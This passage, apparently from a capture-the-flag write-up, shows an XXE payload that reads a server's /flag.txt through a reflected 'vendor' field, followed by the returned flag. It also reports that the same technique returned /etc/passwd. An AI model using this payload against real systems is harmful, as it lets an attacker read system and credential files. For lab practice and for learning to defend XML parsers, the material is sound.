The server reflects the parsed vendor value in its response. /etc/passwd is returned, and /flag.txt contains the actual flag.
Command / Input
<?xml version="1.0"?>
<!DOCTYPE doc [<!ENTITY xxe SYSTEM "file:///flag.txt">]>
<doc><vendor>&xxe;</vendor></doc>
Output
HackrGG{xxe_3xt3rn4l_3nt1ty_f1l3_r34d}